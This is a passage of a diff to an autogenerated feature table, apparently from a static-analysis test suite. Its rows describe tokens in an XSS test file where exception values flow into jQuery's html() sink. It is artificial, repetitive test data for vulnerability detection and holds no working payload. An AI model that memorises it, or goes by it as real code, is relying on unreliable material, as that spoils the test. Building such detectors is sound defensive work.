myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:3:23:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:5:23:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:5:23:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:5:23:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18839,6 +128027,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:23:5:23:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:5:23:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:5:23:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:13:23:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:13:23:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:13:23:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:13:23:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:23:13:23:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:18:23:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:18:23:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:18:23:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18846,6 +128039,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:23:18:23:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:18:23:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:23:18:23:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:9 | unknown | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | exceptional return of unknown ... foo }) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | exceptional return of unknown ... foo }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | exceptional return of unknown ... foo }) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | exceptional return of unknown ... foo }) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | exceptional return of unknown ... foo }) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | unknown ... foo }) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | unknown ... foo }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | unknown ... foo }) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | unknown ... foo }) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:3:27:24 | unknown ... foo }) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:11:27:23 | { prop: foo } | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:11:27:23 | { prop: foo } | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:11:27:23 | { prop: foo } | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18853,6 +128061,21 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:27:11:27:23 | { prop: foo } | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:11:27:23 | { prop: foo } | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:11:27:23 | { prop: foo } | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:16 | prop | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:16 | prop | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:16 | prop | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:16 | prop | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:16 | prop | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:27:13:27:21 | prop: foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:19:27:21 | foo | CalleeFlexibleAccessPath | unknown | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:19:27:21 | foo | InputAccessPathFromCallee | 0.prop | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:19:27:21 | foo | InputArgumentIndex | 0 | @@ -18862,6 +128085,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:27:19:27:21 | foo | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:19:27:21 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:27:19:27:21 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:28:11:28:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:3:29:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:5:29:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:5:29:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:5:29:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18869,6 +128132,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:29:5:29:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:5:29:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:29:5:29:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:13:29:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:13:29:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:13:29:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:29:13:29:16 | html | enclosingFunctionName | | +| 